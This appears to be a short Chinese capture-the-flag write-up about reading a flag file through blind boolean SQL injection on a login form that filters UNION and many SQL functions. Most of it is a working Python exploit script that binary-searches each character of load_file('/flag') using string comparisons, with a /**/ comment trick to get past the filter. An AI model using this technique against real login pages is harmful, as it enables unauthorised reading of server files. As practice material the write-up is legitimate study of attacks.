题目过滤了union 和大量的sql函数,本意是想让人读文件,当时心太急了没做出来,现在复习一下,脚本很简单,利用的是ascii的字符串比较 如
select load_file('/flag')>='A'
select load_file('/flag')>='AB'
select load_file('/flag')>='ABC'
select load_file('/flag')>='ABCD'
简单利用这个逻辑可以写出一个二分的做法
直接看代码吧
import requests
url = 'http://localhost/index.php'
def func(x):
x = x.replace(' ','/**/')
return x
flag = ''
def check(mid,mystr):
username = """hack' or binary (select load_file('/flag'))>='{0}'#"""
username = func(username)
username = username.format(mystr)
password = 'hack'
r = requests.post(url=url,data={'username':username,'password':password})
return 'success' in r.content
for i in range(1,20):
left = 0
right = 255
while left < right:
mid = (left+right+1)>>1
if check(mid,flag+chr(mid)):
left = mid
else:
right = mid-1
flag += chr(left)
print flag